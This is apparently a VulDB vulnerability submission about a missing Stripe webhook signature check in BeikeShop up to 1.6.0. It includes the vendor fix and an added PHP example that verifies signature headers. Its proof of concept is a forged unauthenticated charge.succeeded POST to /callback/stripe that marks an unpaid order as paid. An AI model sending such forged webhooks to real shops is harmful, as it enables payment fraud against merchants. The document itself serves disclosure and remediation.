Submission #831466: BeikeShop 1.6.0 Design/Logic Flaw

Title: BeikeShop 1.6.0 Design/Logic Flaw
Description:

1. TITLE: BeikeShop Stripe Plugin Missing Webhook Signature Verification Leads to Payment Bypass
2. PRODUCT: BeikeShop
3. VENDOR: BeikeShop / Guangda
4. VERSION: <= 1.6.0
5. CWE: CWE-347: Improper Verification of Cryptographic Signature
6. CVSS 3.1: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)
7. CATEGORY: Web Application / Payment Gateway
8. SUMMARY: The Stripe payment plugin in BeikeShop does not verify webhook signatures on the `/callback/stripe` endpoint. A remote unauthenticated attacker can forge Stripe webhook events and transition arbitrary orders into the paid state without completing a legitimate payment.
9. VULNERABLE CODE: File: `plugins/Stripe/Controllers/StripeController.php`. The `callback()` method reads attacker-controlled JSON input from `$request->all()` and directly processes `charge.succeeded` events without calling `\Stripe\Webhook::constructEvent()` to verify the `Stripe-Signature` header.
10. PROOF OF CONCEPT:

```http
POST /callback/stripe HTTP/1.1
Host: TARGET
Content-Type: application/json

{
  "type": "charge.succeeded",
  "data": {
    "object": {
      "metadata": {
        "order_number": "KNOWN-ORDER-NUMBER"
      }
    }
  }
}
```

Response:

```json
{"status":"success","message":"Capture Successfully"}
```

Result: `orders.status` changes from `unpaid` to `paid`.

11. IMPACT:
* Unauthorized order state manipulation
* Payment bypass
* Inventory deduction for unpaid orders
* Integrity impact on order and sales data
* Potential financial loss

12. SOLUTION: Implement Stripe webhook signature verification before processing webhook events:

```php
$payload   = $request->getContent();
$sigHeader = $request->header('Stripe-Signature');
$secret    = plugin_setting('stripe.webhook_secret');

$event = \Stripe\Webhook::constructEvent(
    $payload,
    $sigHeader,
    $secret
);
```

Reject webhook requests when signature verification fails.

13. AUTHENTICATION: None required
14. USER INTERACTION: None required
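The check the SOLUTION section calls for, shown here as an added stand-alone example that is not part of the submission, of BeikeShop, or of the Stripe SDK. It performs the same computation that `\Stripe\Webhook::constructEvent()` performs internally, following the header scheme Stripe documents (`t=<timestamp>,v1=<hex HMAC-SHA256 of "<timestamp>.<raw body>">`), so the reader can see exactly what a missing verification step skips. The secret, payload and timestamp are constructed values; `verifyStripeWebhook` and `SIGNATURE_TOLERANCE_SECONDS` are names chosen for this example. In a real plugin the SDK call from the fix is the right choice; the raw request body must be passed to it unchanged, since re-serialised JSON from `$request->all()` would not match the HMAC.

```php
<?php
// Added example: stand-alone verification of a Stripe-Signature header.
// Constructed inputs only; no BeikeShop or Stripe SDK code is used.

declare(strict_types=1);

const SIGNATURE_TOLERANCE_SECONDS = 300; // matches the SDK's default tolerance

/**
 * Returns the decoded event when the header is valid for $payload, else null.
 * $now is injected so the tolerance check is deterministic in the demo below.
 */
function verifyStripeWebhook(string $payload, ?string $sigHeader, string $secret, int $now): ?array
{
    // A request with no header is exactly the forged case in the advisory.
    if ($sigHeader === null || $sigHeader === '') {
        return null;
    }

    // Header format: "t=<unix timestamp>,v1=<hex hmac>[,v1=<hex hmac>...]"
    $timestamp  = null;
    $signatures = [];
    foreach (explode(',', $sigHeader) as $item) {
        $parts = explode('=', trim($item), 2);
        if (count($parts) !== 2) {
            continue;
        }
        [$key, $value] = $parts;
        if ($key === 't' && ctype_digit($value)) {
            $timestamp = (int) $value;
        } elseif ($key === 'v1') {
            $signatures[] = $value;
        }
    }
    if ($timestamp === null || $signatures === []) {
        return null;
    }

    // Reject stale or future-dated headers to limit replay of a captured event.
    if (abs($now - $timestamp) > SIGNATURE_TOLERANCE_SECONDS) {
        return null;
    }

    // The signed string is "<timestamp>.<raw body>", keyed with the webhook secret.
    $expected = hash_hmac('sha256', $timestamp . '.' . $payload, $secret);

    // Accept if any v1 signature matches; hash_equals is constant-time.
    $valid = false;
    foreach ($signatures as $candidate) {
        if (hash_equals($expected, $candidate)) {
            $valid = true;
        }
    }
    if (!$valid) {
        return null;
    }

    // Only now is the body trusted enough to decode and act on.
    $event = json_decode($payload, true);
    return is_array($event) ? $event : null;
}

// --- Demonstration with constructed values -----------------------------------
$secret  = 'whsec_EXAMPLE_PLACEHOLDER';   // placeholder, not a real webhook secret
$payload = '{"type":"charge.succeeded","data":{"object":{"metadata":{"order_number":"ORDER-1"}}}}';
$now     = 1700000000;                    // fixed "current time" for the demo

// Header Stripe would attach to this body at time $now.
$goodHeader = 't=' . $now . ',v1=' . hash_hmac('sha256', $now . '.' . $payload, $secret);
// Header from a genuine event replayed an hour later (outside tolerance).
$old         = $now - 3600;
$staleHeader = 't=' . $old . ',v1=' . hash_hmac('sha256', $old . '.' . $payload, $secret);
// Same body, but the HMAC was made with a different (wrong) secret.
$badHeader = 't=' . $now . ',v1=' . hash_hmac('sha256', $now . '.' . $payload, 'other-secret');

var_dump(verifyStripeWebhook($payload, $goodHeader, $secret, $now) !== null);
var_dump(verifyStripeWebhook($payload, null, $secret, $now) === null);
var_dump(verifyStripeWebhook($payload, $staleHeader, $secret, $now) === null);
var_dump(verifyStripeWebhook($payload, $badHeader, $secret, $now) === null);
```

The first call accepts; the other three, which model the unsigned request from the proof of concept, a replayed event, and a signature made without the real secret, all return null and would be answered with an HTTP 400 before any order state is touched.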
Source: https://github.com/nuiifornet/BeikeShop-Vulnerability/blob/main/README.md
User: Fklov (UID 98102)
Submitted: 16/05/2026 11:06 (23 days ago)
Moderated: 07/06/2026 09:32 (22 days later)
Status: Accepted
VulDB entry: 369082 [Chengdu Everbrite Network Technology BeikeShop up to 1.6.0.22 Stripe Plugin StripeController.php callback request privilege escalation]
Points: 20
